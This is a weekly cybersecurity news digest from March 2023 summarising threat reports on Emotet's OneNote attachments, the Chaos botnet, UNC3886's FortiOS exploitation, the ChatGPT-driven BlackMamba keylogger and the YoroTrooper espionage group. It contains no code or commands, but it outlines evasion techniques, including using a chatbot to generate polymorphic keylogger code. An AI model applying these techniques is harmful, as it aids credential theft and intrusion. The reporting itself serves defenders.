[CyberLand News] Weekly #5 - Threats and Malware

Last news on threats, malware and vulnerabilties in the cyber land

Mar 19, 2023

New techniques for Emotet - OneNote mail attachment
Chaos Malware evolution
UNC3886 exploits FortiOS flaw
ChatGPT-powered Blackmamba malware
YoroTrooper, a CyberEspionage group

New techniques for Emotet - OneNote mail attachment

Emotet is a sophisticated banking malware that typically spreads through email attachments. Its primary objective is to extract sensitive data, such as banking information and passwords, from its targets and transmit it to the Command and Control (C&C) server.

The Cyble Research and Intelligence Labs (CRIL) are closely monitoring the Emotet campaign, which recently emerged on March 7th after three months of inactivity. Emotet is once again disseminating malicious emails and infecting devices worldwide by rebuilding its network.

During the previous week's campaign, Emotet employed malicious ZIP attachments containing DOC files. In this campaign, Emotet used a technique known as "ZIP bombing," which involves compressing a large DOC file into a small archive file.

However, in the most recent campaign, Emotet has changed its tactics and is now utilizing OneNote attachments instead of a ZIP archive with malicious document files in spam emails. OneNote is a powerful digital notebook software developed by Microsoft that allows users to efficiently store their ideas, thoughts, and notes in a centralized location, which promotes organization.

OneNote software is widely used by people worldwide, and there has been an observation of various malware families, such as Qakbot, utilizing OneNote attachments in their spam campaigns. Threat actors (TAs) frequently modify their techniques for infecting users to evade detection by anti-virus programs and increase the likelihood of successfully infiltrating targets. It is their primary motivation for adapting methods.

More details in “Recent Emotet Spam Campaign Utilizing New Tactics“

Chaos Malware evolution

The term Chaos has been used to describe different types of malware, including ransomware, remote access trojans (RATs), and now a DDoS malware variant. This has led to confusion and disorder in the world of cybersecurity. The Sysdig Threat Research Team has detected attacks that employ the Chaos variant of the Kaiji botnet malware. There is little information available on this malware since September 2022, partly because of the ambiguous naming convention and partly because it is relatively new. Kaiji malware, which originated in China in 2020, is written in Golang. Similarly, Chaos is a Chinese Golang malware that targets both Windows and Linux operating systems, as well as multiple hardware architectures.

What sets Chaos apart is its focus on persistence on the target system, as well as the use of defense evasion tactics that are not commonly seen in Linux malware. In mid-January, we observed this malware attacking a misconfigured Apache Tomcat environment, which generated a significant amount of activity on our honeypot. We saw it again at the end of February with some modifications. Previous versions of this malware were obtained from a publicly available malware repository and analyzed by Lumen's Black Lotus Labs.

Sysdig Threat Research Team analyze the attacks captured, with an emphasis on the persistence techniques employed by the malware. At the end of the blog, it will share Indicators of Compromise (IOCs). The Chaos malware appears to be an evolution of the Kaiji botnet, with many of the same behavioral attributes reported in previous versions. To summarize, Kaiji was a DDoS botnet that targeted IoT devices using SSH brute-forcing. The use of Go as the source language made it easy to cross-compile to common IoT architectures such as PowerPC and SPARC. The Chaos variant shows the same DDoS functionality as the previous version and, instead of creating a Chaos emulator, the team found that the code supporting this functionality was still present in this new version.

More details in “Chaos Malware Quietly Evolves Persistence and Evasion Techniques“

UNC3886 exploits FortiOS flaw

According to Mandiant, a suspected Chinese hacking group has been linked to the exploitation of a medium-severity security flaw in the Fortinet FortiOS operating system. The group, referred to as UNC3886, has been observed targeting firewall and virtualization technologies, which lack EDR support, to deploy backdoors and maintain persistent access to victim environments. Mandiant noted that UNC3886 has unique capabilities and has curated a deeper level of understanding of such technologies. The group has been observed targeting Fortinet's FortiGate, FortiManager, and FortiAnalyzer appliances, exploiting a zero-day vulnerability, tracked as CVE-2022-41328, which was patched on March 7, 2023. The attacks have been mounted using two different implants, THINCRUST and CASTLETAP, with the latter beacons out to an actor-controlled server to accept incoming instructions that allow it to run commands, fetch payloads, and exfiltrate data from the compromised host. UNC3886 has also employed a utility dubbed TABLEFLIP, a network traffic redirection software to connect directly to the FortiManager device regardless of the access-control list rules.

More details in “Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation“

Attack lifecycle while FortiManager was accessible from the internet

ChatGPT-powered Blackmamba malware

Jeff Sims, a cybersecurity expert and researcher at the HYAS Institute, has developed a new type of malware called Blackmamba that is powered by ChatGPT and can bypass Endpoint Detection and Response (EDR) filters. This is not a new concept, as CyberArk researchers also reported in January 2023 on the use of ChatGPT to develop polymorphic malware. The Blackmamba malware can gather sensitive user data such as passwords, credit card numbers, and usernames, and it uses MS Teams webhook to transfer the data to the attacker's Teams channel. Jeff used MS Teams because it allowed him to access an organization's internal sources, which made identifying valuable targets easier.

Using the language capabilities of ChatGPT, Jeff created a polymorphic keylogger that can modify the malware randomly by examining the user's input. By employing the python exec() function every time the chatbot was summoned, Jeff created a unique Python script for the keylogger, making the malware polymorphic and undetectable by EDRs. Attackers can use ChatGPT to modify the code and make it more elusive, or even develop programs that malware/ransomware developers can use to launch attacks. Jeff made the malware shareable and portable using auto-py-to-exe, a free, open-source utility, allowing it to operate on various devices and be shared within the targeted environment through social engineering or email.

As ChatGPT's machine learning capabilities advance, such threats will continue to emerge and may become more sophisticated and challenging to detect over time. Automated security controls are not infallible, so organizations must remain proactive in developing and implementing their cybersecurity strategies to protect against such threats.

More details in “Blackmamba: AI-Synthesized polymorphic keylogger with on-the-fly program modification“

YoroTrooper, a CyberEspionage group

Since at least June 2022, a new threat actor called "YoroTrooper" has been launching cyber-espionage campaigns targeting government and energy organizations in Commonwealth of Independent States (CIS) countries, according to Cisco Talos. YoroTrooper has compromised the accounts of a critical European Union healthcare agency, the World Intellectual Property Organization (WIPO), and various European embassies, using a combination of commodity and custom information stealers, remote access trojans, and Python-based malware. The group infects systems via phishing emails that contain malicious LNK attachments and decoy PDF documents. Cisco Talos has evidence of YoroTrooper exfiltrating large amounts of data from infected endpoints, including account credentials, cookies, and browsing histories.

Although YoroTrooper uses malware associated with other threat actors, such as PoetRAT and LodaRAT, Cisco Talos analysts believe that this is a new cluster of activity. YoroTrooper targeted Belarusian entities in the summer of 2022 using corrupt PDF files sent from email domains pretending to be Belarusian or Russian entities. In September 2022, the group registered several typosquatting domains imitating Russian government entities and experimented with VHDX-based distribution of NET-based implants. In the months that followed until the end of the year, the cyberspies shifted their focus to Belarus and Azerbaijan, deploying a custom Python-based implant named "Stink Stealer." In 2023, the threat actors used HTA to download decoy documents and dropper implants on the target's system, deploying a custom Python stealer against the government of Tajikistan and Uzbekistan.